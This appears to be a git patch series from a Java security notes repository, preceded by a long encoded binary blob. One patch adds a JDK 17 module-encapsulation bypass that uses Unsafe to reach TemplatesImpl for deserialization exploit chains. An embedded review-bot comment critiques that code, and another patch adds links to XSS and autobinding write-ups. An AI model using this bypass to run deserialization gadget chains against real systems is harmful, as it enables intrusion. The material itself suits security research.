z2)pjtnBLkVG*jfvJW&t$hK`Gslt=m~^5HI;r|fT0J2*_IDhMEm+8kDUx7=6z^QNAyn^fHEa=!HpIU8zt9Yp)}RQALC%OHA_Y4ibCISQymrrs^B$YG1#grm`Nz9G)U;C( z>Yj0CZgt{ZgZ0ur7iH`ISDXXNBxSIHAZ{O65AjEPbX3wHZxN%TF09USn)>VdN+&`( zA_|G}Oa0wU$qh1YA2bV6I_)O)7GqnE$XYCNQ-9S=cNuL+gCjyT|1Istm~Uc6ANGf* zzFZWWD3+UOyG{W&Sa9;~7%IDW38vp6elD`_f)M$}pSwsep4EGgEAfw$g8i*NdOMSS zuJ&^#U_TEIz0bALy$fG1g06UtxSrRTFx|Ihm*I=M)f;(1K+84>9VyQ5x-^^3y6Yxa%=eh=~2 z<5K4vv~j+9v1krg0}kReYO#{iJ=<>X7-m25B{2BSHSr#(`O3=!~*Wk{WmgHWEf_) z9x$V_4qKq(osS3K8a%v+YoT80SLO?&;Kipu1NQ8gW*+t5Gs5z7Xpmc;mZG^2ip18{ z($gD3E-G12LI11DKBPNA((p+V-fo4{z+t;3*n^_W+tbUphPlP1DJq0J^Vm}2@Ng%2 zF<&ku7|2u=&rOSXt<^hb$n`HCI)wS?B1`PdLnr!alMQv-f2RK>-4S)pvzI{iFrPzo6tA=VQRMw- zrk9g^2G5NIV(F1$xv0gEu7%JJ)!j>nTLcDfPW*}Y-9dRRHvp?Cd#b_D}uru-Is58s=Y z%mBn>P)O_AKg%`K?2)&17BiJ?aewW_kx{j9Tcp*YlJmjc`q7U#7SAa4hfeK;f2IU~%JFF;R-hwvLy&Hl~87q3swwqoh-FC}{Zr4P& z7%gG^t0obbvMQ{z$hw`&9QSv3Gvx+pH}8)1o*}83Hn`MuXZ|_CW5&&iYn%UeI4Gx0 z64)T1;fXW^D@bREO{BLkoqjZCs`6rvQgJ@x(1;V084MyO@2ok>Ts8z!v!^oKS7~@i zi9ju{@CZ;7`XO~TTorLme470n(K9SZ|AUm~(!geOTL>_Ri)D4n^pQDmfP|C}GNt zr>Cn1$5L3|im2{E*eiNZjMlg4?FAp-fvE&Po6qqcQ0aG`4a`ckl2i1%dRbur1Jx*k@lVVz$#^x!T>oMy z5rG+VASa+8$3mRT2LrX_w^_ZJNEXj>W{gz!aOC-d2=M_7>eM~8hl`ZkVT(A3n$zrY zVM&ak42Al)Hk5e`jo7e)XO(Nf^&S9-0zIJ?SxsSD!;tPBac@VT`tCYCpYW^km!`HF zy+|q;1ZZut4@Uw+Jxu|LV{!vNSqTh7RPL8*LFj}GEXBK2qE0NvjQUcx4C#wIx5 zVBb&Q8T=BL@O}@;G=p?$RKY#DK+~3CNdhtbQsiZ_iQt=|k_ciIER85Ju*Rv)hQA?; z?gxJydWz9oCqqVVqfYjZl{;~@o1VJ#tKnD8M8#0XBD4t)T<XR~O5drioJYPcpYxbWK1QvbAhFC9*!nPAb2ru)%x*T8tKon~yS1uB zYZ~r?#(@Gm$^Mxtj`107o*%NyR$95TCIsB#pQTc1!Z0pcZVbN#;q+DQ)DS2AUf}hP zflYke_!p=~;E_gp^hw7UZC~AA=q`vNgs5v6ivPn@(alYyM=TuL8H4jykfkt)KSKpH zIXes%qy7Tcl6#i{L0(DvW4s(uj4f}b&6Ze)#ut3s-t8^g$G5tchq$RHlzrX{i5F&U ziVGRXkY$)sP~g zn_UK*!EG{mX*qauw$hCeS1L>w;2KKCM)bvcBes)$xbsO|lH1dpO{+P$kuK(I zibL<%O3+Tz@zidy_5R*YU@rhb(*vg=^FL{jB*@oa``a#F^oZB&KC{F51%YAeFSNs7 zgiIcm2;+@0#c_x#WIz!tQ>_V~8X`3SwDDfSS7`Xgj%&g;fu$IF4Q_er(~L02^ie#_ zDft;Ir)s`X2e)RF>yvpcA91p8oGLYSOA499O51a%AJ+ML=l2vka6>q>aM8Ib!HSsw 
zdFwZx`{d@!{JGis0BX_$a3I4>KI2X~&)gaD%7uG(4wS8#XA{#q+~B%P=xuAHU@`yx zRCVgyf`#1oIvhQ+4W6MTCH3>F)PF<9{KXtdUc2> zJRCo~kq?p2C&mVJ+5FUu$L;wb$LsnJN4^<30QhHj>d&GN$3(kkla4C%8tA;;9SRG< z$f6gk`ffs^ZVLoaY?OHIcn7S47Cl(lbXwxZ0y355<%6N&!t{mE{~NSgEc^wnjTRAh zSOV*^8{h`7NTwt|jXD`Krb5uBs6Ql!qNR>G-BzC6av52|ouMl9O>+$sYlm?Q(3yIV z0*l}&6cRQcyJtyG_FWXdB)HQc6aS8`QX?rxLGcVEb9JO&mII?Q`AH+CI5j^;hSFdj z2_~YV{AA31qtZ8XwNOD(@gw@{=bmBi;fxgN>f$xOcLvWK(Sfxt{^d#Hfp65~JMc1R8R8sjy_ zFn9r_mpC!atj$cJJF!s&%nfN(FF~HySi%L)WDX1?*MC9owGx;iqXac*<97BGJMWI= zjh?a9UocrlG8im$j)(VSk%l(f5V`vQ6XTva6@55x9I6Q1Ic)2p!TVz1=hDws_AR5! z(C1h9(#IRmYRUwumuqL*otS>1fix-+37EdN#)D5pjwUt@8sO$FN5@9+{pAzSfoHuQ zc_Ys=;*HpU3sBS%L+ZBpE+xw>N@+?UVW-!Gy&Xi&+d1k;f^ApV@Ttu1*TW5~ZlP%p zYYE4eEu)sqyXRV~0^+#nnQ-^A zEYz#tglv3pZF-4W{NI-V{9wcw&1V5XFC<4*Bjv1_sI&?bXkW;Js`F5C@HIel{iEX0 zB(rSS?@#&mK4GD5Ik#ylkT(K!dYUYE{^X)~rxtB%A)9vA zqI{DqQmDJu=*H#z+2DbmAqGXvS1}lY7~#vGn_oWo_8bBJ@qSZ?|F0}_&G|DXyb1Y% zw_0J5c)$w)dH`zNlSSmN8dj;dGYC!L$R<4>(2 z_~da#N(YHYMPr*f24A)jM~M6HkFm_P5&#^xdaD;95WG49;8lCyt3(e!WcCw`O~ZDa z%{A8`5nrl%SNq*-#MdFdr%zT;$|Hm>=JZQ1+e1`SF&V;Tt=E0jyUW|D!5v2^fvR8< zr}j67SU(Aoeqjc|Irxsx^ z+^V@hbf|UT)3x9az=a*jhu$Pq4Y6Ciz*hXP3m~H-dFHNw126OCwGj{Ur7m3lF2aab zXl8#6anhTL0$u-mc^!S?vJI2- z{ePMB*i{9BPz?Hq@rchJ?nlnQ}N>gS`XGvasSE+)pUPW346}GtU_ZQn}Zpn;uouHPJR%S6t;2Bse~Q z8Ej1)hH<`9`qPtM^$BWmW1`)}Y|S8#kYHn)B-&$eh}sdYr(5KyoYZUAj!}cUZdb@$ zKk4hGYgquJ%G6|AboUqTXV|%P zd3Md?D(Jh_(%_qwP~gc~y>!r1VYnGp@8wMt3YX8JHzRbzZ{_RrLPVZZ^cA$-zve&E$`t)Z|Osm4sv^v`~aFqlavGH}e;c|0PcvSE|Yw%0Ba?CWMY zkh~jIYUWxWYBFuRdM8(++<Wd*YQZU>PlF$4|to(u$FGrb~gnGL}q_|5V~6`7PD)NObGgz0R_qp zeN{b=P^2)DH0jvR4&_Nrz`OMRi2^7~t-lU^xxFqXhUU;3H3E;@`qQztuSK&VZ%ZP& zMK%lt`DUj(jaPLYSAC<@z3GTEP-RX)0sjQOZ-$%UXYBPyj)m+3Gh z>Sm_${`kJ6-MKf%LdIr)IL2|>lGf&Q^L;Ovvy+7S%|ImGLMy#)zLZi{(q_#gtWCv{ zNu`cp0NAVN9^lhr^=$qHn}Ew;o&d66NF(7J9IlQmL2eOYM;iZ~y1-q4Fbbq1(!DMZ zyd9=SF|F6K&4gr6r_ESN%@ds0B9xKDRmNKm=I-_oGk0%bs(U3pZV*8EfZ!=@R}k`a zW98gpnB;Dk1<}XqsC<-xJvgy7CVSxG_ti#;ajr9X=BM3v3v>6)fS3fOVs(x>(cf~b 
zBb%TgE9->ITObTy(9Pqj6{Fe1WkLJ!e?48;ly9xiRt&N>gt> z7awiO1NU)BK zuJCQMAop4gkCLnF$$fCDlj?jQPrgyKY_=!a@!#?UNM5n(cu=EVTJN;3qeshsYcnMh zY5+%H9D@e=+H6=f^|ZxGFO;s=UcCtt;Wz3rm3HEoG#X!OPq~TH`}tTB5Qpjl;Lya# z=PmFinlbxWU=Zn2^{JY%a+7y$cn{5#IFfp|-};I!7F3`3&nQwZ_vgIK7RY zuI6kY@q3W%-AS6Pl-Qc#0F2PKXV7b)1^LZs5I(KDuB1yE34}7JN0iT4cX9vvza%q2 z9ad-Ew`pf_j*CHzvD2nTez7lg@I1>sw26aCgd(L*-N;QxzdL2}YA&xZV~=jpaK3CD zt>mdN|8h^BZ5A@?&4;9W;+JQlPjpSPI0~4!<_jRKLeJO*)}lGj6UQ6U74iFZ$NP0B{zRN@g~JwB`dPa^Q>hh&by~7IvC@xwe`H-G(rv_zC z>fWEx$8_Gj{JMuFCi4GkF6l&(SorC1wdx6`6W&K6S8a>;ovI;sAVOEieLIY-zpB+zXfj(p{DfkiS9Or+LV{X~4z;Y>=K8kE!8 z*X(z^K1VPaYKE;a+8dHqzj@6d5)pApsUi>Gd%qg(=MckY5^(}>#I-3+kl!!m?Pvq#j6cw=#Qr#-@IY$qCm~_rde(eGxF-{rS*c_L0u5M}6 zawswHKIs@C$BAB{FYJZFb{`(k{@{7~hL|y()~{bZbD{F%UIRnQ$a9z(8>hxtXbn5g zvRj4dYTv{UYyRV5meC#tSdJkOHI)7eyVhW-o^|G5pIs*&uX#b2$aE@!?d&XRUt>4x zRGz*uiD0)mhbLk0>V#ARuG=2E6~1Pc#lgW3@-I7h0I3kBGp$~CpO|T^b-@Ylu5V56 z1|Qa9upO7e-(~N5%#=@hF&IqA=HJkkRR$;C635r%@SZ2 z2QoOB6{`d0a!vrD%%S){!T5VM)MyKQ5gJA0A(kFa#zqBf71{DVGlM4A4V4lX#G&Q) zViW8U%EyErJr-GXHK{3PTJAePGuG$g4M6*sIUcPvfcZ(^CSlT>`YkAG!y%!74k;gF zt60@yWyMcRthj}ZqM8~&nCo;0h!G=7wWb_wlkzVUJdPd)ors($^(vc3W4+~*5IIlB zt0PAh`J8^Nx%%4gl0{UP=MS}(qN1-jn4oCN!Jumc`13~Bl(@1oUiMkfWVNo`%u!Kg z<$|;;iV(eSxnotaQpMtF#G^pYgcc;H@KVV(NP9Wkez>|4}2L4(H$m zin^NeN0Cl2^EmhLD_z*Z9kh4g6Q5S~pxkOniE~{5SNI`&2Ab%s;%eH@>$4=L(ii5J ztIw>{QE?kmY43=eY@%n5q`(@udc)n?%-H(dqZIww;>`y;Z*8qqjYWQU!&+P#(}(bo zc$~TI!JZ*{x`jkYYT47*b{i$E9tT4Xt)Om78hz7l)O(K$XemHeL#I7UR`0`y66;;% ztLbvM#_Q?`FRKn;8eiRcb%Ia}IY{c4M1i3tm?>2itpF%6KOB=_VDjFr+As@r_fBT$ zlJNiZ1VjC9dE#7R-e|=IbU$W}tbs8~H4U=QF0|aCV!pC%A4N_{VpA$YA;OMMJoCM_ z9e6jh!WK(gfU208!H^zOWh2A7Sch1mPvBq(jQ1Il9Zfa#B=@(-H1K_ysG@>AVg0%J z&lZNmuhOfXm*NJ~K5l$Rz+5!PE6V?ILVa^9GKx9SOj-9zV9m??lE00io;e?Y!e>-e zjFlH=XIFn{ZtKZ(lnpz4^PueCzjh9g$sJ2z z;K$(ij2i^a`6}xGH9r%?`I%&zCKh>pctJi!<15$~6BxZvb@|6IRC2~ieZ$UDaz-$? z`xUQ$;xGhTB@ozN9>&RDrNMeMcawCD-XJyH^|KRe$xM7E0P`Lsen2X@d+T;jwfmP? 
zwhA~gh*KnpSj=?*(6nR6Qpymf8mxY5x9;z_qQ_YFG_;+Ro_IpnC82NA%j& z`6Fz|X!Y8ncDE4O6t*=J>HnV|N`7E%wZq+vP70vOf%M6`Lgit(U=0a3V*Tt&5F;HC z%jFe4Sm<;hJ-O&tgBzhld?RG25b38LmO4aXHX~B!59jDvnID_p(_!iEj6hdhUF`ITr9M7wUz=SThR4wdCbfjb?NSTqZko@^_`xA^qJR zS9pC&U%jj8!&#%@rW!ek9JUpI>S`7@;q z)Qh;ne&sa50T*Z(ofb!SNL}>L)BLCRfT?BWhFCinBGChQRZ6^JzqSsytdeZ#eg$lt z>F;|63EiFOuI--j?Nvytn)Rkcl;h2+VKdA4a=0eTE;l3ky`2gZVx5Q5A$k z?*e53;$B}c;azMaX30T0xn9Wu!4~G&`ftyHv!z8I8}>NZX|FCz^(&e|c!U^6zaKad_}aSCNYFaGI6H=I zM}I2i;ce7}Mx8FmB$onyBa9dozR*1xb(^LMC7`{22f2Tp9IM6b0fIUGCxhhNzLO0* zx7Obh(FmJ2#Sx%ZRI_+mq=u;(8s=ih+!19?#~Hk zWf=+-I=4LbBhK5CSN_(7QzOkvT_cG+oNn3gFYp}YSeglN{Li3|#DtdTyd-J&`FkFKkQRa;h*Xy~>zJsX_b}OUA zJDXFMT1ruj!h5PO=C9JDzAyesNf$qIX6wo9voomh0y1<6b9ZQcbBomhb{B6P3kOK{ z$W7a2K7P1F$bpcqWnPkQeL75c!m$&F|CP|Xd*=Rjg5?&vB=QwhQEmtS*!&8=Nm^1x zg+Fsu_uHdFOY1CoT6ZhXyMI{fCPUy|_LRr%03nv@Ohv;neJ%o(7^rc^t;T08N*Xvh z@m2RJ0vSK|h%V_+|Nk!W7;RA+(x-ksdRjaAD(oGDDH&ft}X5qcPmgNxK?o~7Bo;a zxP{`BQmj~lyR=wvDemv)y6)cZ^UOEz%=Zs7Kqh-<@165p>$i@z4uKQywUop=G3gfe zTOz%QRfr|_;4~m6?W?>>bR9f(XG=fe-#fzi2 zr?wKbB9MFF%MEQ)S~nG_66!%UE8_|1v@tZH^f6`f0R zi4|zk@@}vEf6Gt*`F2;tQ^uyG-^JP)GzZ0VHT~3C8Be%@%v*F0`?~@+XY+ybQxJ`- zGob$)%WiqMHm&A{e@F22eGzQP{|u#Vl>AH?3usQ;wfSiZfFAa_{QqfUY=U*y*FHy+ zy1G05uGR5h?dsjJ|Mt3*$W;9P|1`c=2m_wSnSgW`2Ol(L5|oVN@P(r#4C3J(+dy;o zS67zQ)8kUg6b=`qv}?EW&Q;MTQz8SJudcTGC@l=$aZLD(*W#EkN}@D(uh(Xv`0WUf z*=Fyc2D8SsHG#RzYjWTQ58%T7cH1Xd0X8py0u<81QIYlH9-ua5Er|q-dfBR*i`R~= z(g80J>&;MK^H09!)05^V4}q3-UDrp7{GS}xmoAc%5eKquJms{H%11K517im6=C{OW z=9l7^acmap0H7SzFZNa){r-aaX*}=)kO)P{6rVL*yIa>AR@@c>mI_4cQH8|)9u28y zGeC$P{Fu27>3MQ|?+#Zo^dMzjOdW2`v`jLLC?Xyn^v-Y7MCJOozbF_YCm$wHAwyzA zvt?5^d!(}Lt#SJir?XpSoT@|3TTD)gk*|%=yZkOI-{FeX2rX3$VWllBcGvDKkAwC^ za{;QW&wnDo4jxVZ=v9fa?+@NfeAGL$!gPmX%&urZvwG{lx$OODEmwWA;}ydG2a(Kh z*e+P_hfmwjygo0LvE0Ew+9{xhX!{n`V9?i&Lj0m)kfXOsq(dp=a%)^ z-dj@SYcK6(^yKBNT^k$vtIt*gRo+VYfvV$T9ep?|uQiUHp53)m zW?fhrL*EK@wM02R+Ip9Y=`T0g9^0DY$!W@M@?PFeOfF~VA?#FJ`NJRoR?1v!zZFCn z(Dx{ImpYpkIy82sa@!s((L5*@AEH>c=mrF0`#*USSOLWp-FCs2Gc_`6KzyD|Ok(1C 
zDb=}kp>#|sKGyxD)!N|spr96frfKx}$%szSRT~TS?KQvctdW=WeuAd7$GsASC!+k@ z(Z{cU19VQC^G4sNwYv(oe*DKmS}V=6!FssyndUZeGt3)Ox{-`ZqNkZ!0=hPbW(^aG zYl#jgi!UD24l|K}tmU&T1|9TybLg11uNDc_ArG?6=3P;>5dzzodi7)+c8QZ`LBI0Q zK~00dCI$IU$9}EPNbK7aD&YioY1$9a%KM#q=qSa}#Nz_hCKDP;;{uDRMA50kei7Y+ zDhIWV-G+uZb3%ubwGj>dCTp$0JiORAQ|!IrdB4=cezbq}R9Eqdr6a*07>`~BeYRXq z6Fh#PLwWSG34R;V=Q!!n2SjA^x$MZiM=B}nE+@?TwMMU;Mxs1F1P8t(@0v@BGaHSStS zo@^vWJ!;EM0hPM63e$lHfM`hQD^%xsGi8qM4oCX3Y6X^g8F{{OWWQD&T}xy2X!nsFUFbHi>3wCW8l4p~)JnynUP1vPhWA7;on0YXh}~t;;ntK^ zU~97ZX3N)DnvDFes{GEt2YnNci~QUHnVpqpi-^)?nD)3}&7mYLq0DU#pK{PJrj1>D zU@0_UiqFxmSv%=5&gL3{g!ANg%^HDZeqNmDGaAbR%w26VT7aGcPD^-fJQRJl;6C_r zZCY(}Yay>JkZOIibk%)ush|(==o+6W6h)+fS2%=G{u0&OJ9*-&9^(sLc3vV|j4V%? z@g)att^^Dvh1~H2kcaQJ@Sl_R@1MkKwf|mTY?_I$43wG$|uLwIj_zg#H z0Q6x@Xxe~Y29W0sR2y&G)vQ;h#Mr3>hpBp2pNBdeod+sQ+y0gul=gxhjY)J$dqXe@ zfirK8o+bwbSeuE*nhKn9T#<*_a#qtXL)rR}jJeRQ#ZL?VK3fjldA|)4*lhUh@h*a1 z9qd@x99M$j*W{9m?vL^i+OCRgAqL?Tcj230bG5YOc#=2)Qj_;*Q}2B?wnrL=4(-4D zE^4`+z}KcAJ?}8-CukVdauQ8mc$xXuh2{5mYM-zYAVoTq3b{JIKC3o@I%{shPz_4= zbuQuhKoAFeBHYa-4E0joxi!txzdkUwi@lJkCF8~0%`Zo7RYFR@Tdk$E_T9QZPmv0Tjrp|YyTHy#|F#<)uh zCyJqnoz@S|QIBm7F>|3yxC1M{XDzyFn<FZG!i~yOhcTuLJ%a%3IUT)hcsOn-vjFuH{C9wYbHz zfW`E=Aqw~PotLy6lZBfZE71TNbz^Egg&%w`WG*~ZoT4{{OWik-1%&?;_b)UXhGWTl zDfz11sKGYUu$ZlKpkI!x7GyX-rI`OmTNi8anUw&bR1^yaCmh<8OfgCkBl}AbC$aDt z4eP}G01aeND3n~17?~r@XwGB5M5sv6(t9)%RDG);i_NBA+S{?@apkTk3Ntnil?hGr zw}eTbCuDuN6n|9;cz(xR!(OBT%gSW_ybNH{%S6R`=w27=WH9*SR6|zTB`vY|l}RSe zU3wN%WpDvXEz`2yF_-_=#CIrx#}>^h^oRU6J8Q$J@o&l2h^j1(p0#}Ek>u^%-l_<| z66lSp+j>-3<9Fi+4Z-Yzrw~NUqa8}|Ait;nnwHbLo5%c=Y|_-*hJD*&j-$Fd!q^;B z8vac}wI9{vZ>LJLz5!@fZRMv@@PO(HS!*q?zi$K*Q_{8x^5WTkp9oMigfv2i?(*^v zhtvq)&|aI2 zwyjEJ%$|~}Z~^2oU(0WtZ?P3Me0}TWK{9vlnv4v4-j$1gG9F*GTn0lriB(wkiaI9l zwy@`cxafL%n$Hs{ zy9*SCzdUUl78vt@YQP5#z6%JjeR`-X=!LVE5ZeBSvwbTDXGELYdwNPZBDRly4X#gL zuxle=Rr&Gz5)y#T@r3Za-l;o>5JLItOaAm=F&N|OcZv2)Haoys5da6GGlTKWD`x!x zuV;}lBe+mBaI$&ToHS`GpNX(NvQMBuu~1Ak8gW$VB^IdH4wTr4I$)^@a9n&61+VTi 
zw;o%2unC({oi^9_1ikMYCuAiwr%OYyqb4j@l*^U7CcRKw%wqmKTv)@wfx}WJ&%>r|#C`MWu^d?q^ExgDdO)&Ijk0i!G^X=*cxlzE&be*kVq*ntOH$ zKkW0N8-WW^0!d_)r?adJq43RCUE?*>fYyXoYNCHjw_#JaE03J~dW|Z}xEHmq?#X=3 z7TzpS2V3CKJ>Inzw0*qyg(;n%Ga|ISg2IYd>cX0nTRK5Yb{A)s1k-G9J&{pn3Ka1k zwlhC4jeU>Cdm8sPz{P)oD{jb>f>@i~MW_>n%xD&Q32?UlL9J(c2RXj81}IG&RR$W| zyya1AMv!6rkZw|)z4KRk6q>pifO0@WE?a~@holmqr4*aOo&C=c=AWBb)6=VpIz@Z* z3K*%ZQXPCJQA7O7FsQ0AF(R=@zqdMmMB-{obC%^yUc_3@w)kFTNJgAwTDfCy;ilMO z;5Vf+ClLdie!KSSs-xPy0RPmnU{Kel8&!?$ka2kh57~IK`R|;>@xL4ZFipNu(H?R#OI@&p zMOV`-4O6YjG1XaGI1)t{s09xobyV-wRJ_x)bwB^|5nIq)r)_{fYAlCp(TDb*Xf}6- zRefNKP8t3#8`?^rLN3<%32iTQZ2yT(vY+bVt%4g%D}LDOY8)$0#=-i6eZh)+psp97 zM{xS9ZaT(a&t|ipNk^L&1(5Bl;x0S2)NgRS;g$SYmlsOhWp|xexuRY#!i5T=tiHd$ ze^{;Ji0Kbbfl&l^L_+r#2o{qV`kqr^E*E#@$0o@=Vj4SJE`zB6Yp~^IuFdEda;5BJ z?f{=~!23AA{IwJt2PKMkyZBvs;B+i0y@l>ajc+C*lT74Kf-gAA!IA^QHDvZGrpll9 zQlmIU^Y)!ARMw07lbc%y%h-#G?PY0^o7#>tBLV`dsCqUirM_laSpD{=tXfW0Om%+l zffZ2Q*b=GxK4V6Ui zcgek}EM4|_`@*wvOS2MUg|DkA^zIb9WOukcMWN16i zQOvDXHGM_sh^mvc0FN(GwdqcuMXkutjV6elmRa-`~fEx5$#Ruo`k6& zrlOvSVHqQufdlZPo1ysB+14LZo~mz%>3QT_6U6{Go36_DgM{3Xo;#D1FS|^5D>*BW zUe_L9*eoZ4+8%ZLaa>l+`VhQjSa}UXsalaQBNW}!?*bL`Y>Lx*f0{efjmMP@E42{K@@6XWrvE2X*-h8#SS<1ta|MI(1^ZAg6VT&nxN{a$AO-h-BQ zgAP1Lw9&vP9fNpLjgoG+OQ4syuwff6Vqc;TPY<8<$;LvFG4P6dcRCau{kk@%U$1)igNS|6G2u zA999>c;?SGl_Hlc$2M5cJ;)Ztp>4|H^%vfA;1rzAIG~XBDgw;U{86^$SZqT3sI~m6IJ2SmwYlPLIJ7P9<6g2_H^e zo+FHTaqxedKu5T|g%E4l)V3rjboItn45Jcjv zJS%O1^9fK%XJ_$%NpWIXnF=w>&g~EsIP+X@ccbn}5+~N=QAbGl->i)kKWW0Km8ApU zR}cq!ViBK-ENaG{=qAq7>x^Sz+}Hl`Y!bCYwtfDej!k^GV5G6!YgrC52AWuw0xd`| zynraSt3QP-f?j_(N1W>0wq8>5Irp4C1KrfQWjZY}LQqn4sm@i1>mIf~Z+{3`&Q?JO zohNhqKW&_Qa2X%m1%NO6(LD5hc@OFwYPCoDy%vyXPQ}MeSE&~igCK~ED0l%=5F|#< zFgd!PDf#QLZ9H@oVxN*A^`2FR4w7(=Fyx48mWdlCOkABn`}*c zbxt|f1Of0#+}-9cJXp%KPBJyB&CSY%5=$5h1A%2U+iWqCaX3jYw6Iz}Kknx$iuvy~ z*v%qBP8JXa3|Qjs#Y@&mJXP)fetWW74yD#!1;$`s*RR^{CctSJOcN`rvp4HFFjjfBeV=<;T5>CFR* z^2gp|Z%f#=WY^vJdZkY4`d`Q=UvLb1`|VdFo zW;Shz2Nd7Tzp`X<`qR5V&diQWJXfc&VVK|ddvO?GYLi>; 
Date: Wed, 21 Dec 2022 16:15:35 +0800 Subject: [PATCH 149/257] Update Readme.md --- Jdk/Readme.md | 104 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 104 insertions(+) diff --git a/Jdk/Readme.md b/Jdk/Readme.md index fd5b9b0..7c4acd2 100644 --- a/Jdk/Readme.md +++ b/Jdk/Readme.md
@@ -64,3 +64,107 @@ public class bypass { } ``` 参考:https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +jdk>16 + +jdk17 bypass module + +https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/ + +https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +在jdk17使用反序列化的时候发现要报错 + +``` +InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed +``` + + +![image](https://user-images.githubusercontent.com/63966847/208854101-cfe0eee9-5882-4450-9d82-7092d353e30c.png) + +限制了 + +![image](https://user-images.githubusercontent.com/63966847/208854137-7c56007c-ac54-4490-8f30-2753cc0e52e3.png) + + +限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + +## 需要bypass + +``` +按照提案的说明,被严格限制的这些内部 API 包括: + +java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。 +sun.* 下的所有类及其成员都是内部 API。 +绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。 +``` + +**code** + +```java + +import sun.misc.Unsafe; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.ArrayList; + +/** + * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + */ +public class BypassModule { + public static void main(String[] args) throws Exception { + final ArrayList classes = new ArrayList<>(); + classes.add(Class.forName("java.lang.reflect.Field")); + classes.add(Class.forName("java.lang.reflect.Method")); + Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); + classes.add(aClass); + new BypassModule().bypassModule(classes); + aClass.newInstance(); + } + + public void bypassModule(ArrayList classes){ + try { + Unsafe unsafe = getUnsafe(); + Class currentClass = this.getClass(); + try { + Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]); + if (getModuleMethod != null) { + for (Class aClass : classes) { + Object 
targetModule = getModuleMethod.invoke(aClass, new Object[]{}); + unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule); + } + } + }catch (Exception e) { + } + }catch (Exception e){ + e.printStackTrace(); + } + } + + private static Method getMethod(Class clazz,String methodName,Class[] params) { + Method method = null; + while (clazz!=null){ + try { + method = clazz.getDeclaredMethod(methodName,params); + break; + }catch (NoSuchMethodException e){ + clazz = clazz.getSuperclass(); + } + } + return method; + } + + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } +} +``` + From 63b0ceabd7324ce197f5b7ab3ca1b6b60952fa7e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 22 Dec 2022 12:40:21 +0800 Subject: [PATCH 150/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 ++ 1 file changed, 2 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f3aa154..22a163a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
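Review bot: in `bypassModule` (PATCH 149/257, Jdk/Readme.md) the inner `catch (Exception e) { }` discards every failure from `getModuleMethod.invoke(...)` and `Class.class.getDeclaredField("module")`, so a reader who runs the sample on a JDK where either call fails gets no sign that the `module` swap never happened; report the exception there the way the outer catch does with `e.printStackTrace()`. The `for` loop also writes each `targetModule` into the same `currentClass`, so only the module of the last list entry (`TemplatesImpl`) is still in place when the loop ends, and the README text around the code should say so. Minor: `aClass.newInstance()` has been deprecated since Java 9.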
@@ -218,3 +218,5 @@ + 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 + 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** + 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** ++ 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) ++ 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** From 2c555b4d7fddc1d2e7574a28197127df62a66be6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 22 Dec 2022 13:53:25 +0800 Subject: [PATCH 151/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 22a163a..4ca5bb7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
